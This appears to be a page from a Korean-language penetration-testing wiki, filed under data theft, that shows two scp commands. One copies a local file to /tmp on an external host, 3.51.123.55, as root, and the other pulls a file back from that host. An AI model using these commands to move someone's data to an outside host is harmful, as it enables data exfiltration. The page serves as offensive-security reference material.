> For the complete documentation index, see [llms.txt](https://www.pentestwiki.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.pentestwiki.com/data-theft/file-transper/scp.md).

# SCP

{% tabs %}
{% tab title="파일 보내기" %}

<pre class="language-bash"><code class="lang-bash"><strong># 3.51.123.55의 root 자격 증명을 통해 파일 전송
</strong>scp ./data root@3.51.123.55:/tmp
</code></pre>

{% endtab %}

{% tab title="파일 가져오기" %}

<pre class="language-bash"><code class="lang-bash"><strong># 3.51.123.55의 root 자격 증명을 통해 파일 전송
</strong>scp root@3.51.123.55:/tmp/data ./
</code></pre>

{% endtab %}
{% endtabs %}
